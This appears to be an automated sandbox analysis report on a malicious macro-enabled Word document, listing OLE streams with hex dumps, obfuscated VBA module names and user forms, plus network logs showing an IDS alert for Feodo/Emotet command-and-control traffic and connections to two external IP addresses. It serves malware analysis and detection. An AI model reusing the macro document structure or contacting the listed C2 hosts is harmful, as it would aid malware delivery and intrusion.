                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.251933307426
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 548
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:548
                                            Entropy:4.13263574365
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 7215
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:7215
                                            Entropy:5.85763392146
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99191
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99191
                                            Entropy:7.38970982064
                                            Base64 Encoded:True
                                            Data ASCII:w . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . @ " . c . . . 7 . . . @ . . . . . . . . . . . . . . D . . . . . . . . F . . . . . . @ " . c . . . 7 . . . @ . . . . . . . . . .
                                            Data Raw:77 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 910
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:910
                                            Entropy:5.34567175306
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 2 B 5 2 F 1 0 A - F 9 0 7 - 4 C 0 0 - 8 F 9 B - 6 A 7 0 4 B B 5 A 8 9 B } " . . D o c u m e n t = J 8 4 q p b _ v k j n c 1 h q / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = E 2 a j b o 3 k w z k a _ d
                                            Data Raw:49 44 3d 22 7b 32 42 35 32 46 31 30 41 2d 46 39 30 37 2d 34 43 30 30 2d 38 46 39 42 2d 36 41 37 30 34 42 42 35 41 38 39 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4a 38 34 71 70 62 5f 76 6b 6a 6e 63 31 68 71 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 296
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:296
                                            Entropy:3.80617361515
                                            Base64 Encoded:False
                                            Data ASCII:J 8 4 q p b _ v k j n c 1 h q . J . 8 . 4 . q . p . b . _ . v . k . j . n . c . 1 . h . q . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . E 2 a j b o 3 k w z k a _ d 5 z . E . 2 . a . j . b . o . 3 . k . w . z . k . a . _ . d . 5 . z . . . Q t e p _ e o
                                            Data Raw:4a 38 34 71 70 62 5f 76 6b 6a 6e 63 31 68 71 00 4a 00 38 00 34 00 71 00 70 00 62 00 5f 00 76 00 6b 00 6a 00 6e 00 63 00 31 00 68 00 71 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00
                                            Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm1/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm1/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62034133633
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm1/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm1/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm2/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm2/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62970308443
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm2/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm2/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm3/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm3/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.63438395848
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm3/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm3/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm4/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm4/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62402723855
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm4/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm4/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm5/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm5/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62202697924
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm5/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm5/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5943
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5943
                                            Entropy:5.2550902767
                                            Base64 Encoded:True
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                            Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: SVr2 curses screen image, big-endian, Stream Size: 1055
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:SVr2 curses screen image, big-endian
                                            Stream Size:1055
                                            Entropy:6.6689659801
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . v . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * l \\ C . . . . P . m . ! O . f f i c . g O
                                            Data Raw:01 1b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 8f 76 d0 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                            Stream Path: WordDocument, File Type: data, Stream Size: 42542
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:42542
                                            Entropy:3.7023684026
                                            Base64 Encoded:False
                                            Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . D . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 44 a0 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a6 00 00 70 61 21 5c 70 61 21 5c 44 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/07/21-13:43:41.778972TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 84916880192.168.2.22184.66.18.83

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 7, 2021 13:43:19.017200947 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:19.254103899 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:19.254256964 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:19.282660961 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:19.519469976 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:19.523015976 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:19.523066044 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:19.523104906 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:19.523183107 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:19.530138969 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:19.767519951 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:19.983613968 CET49165443192.168.2.2245.119.81.203
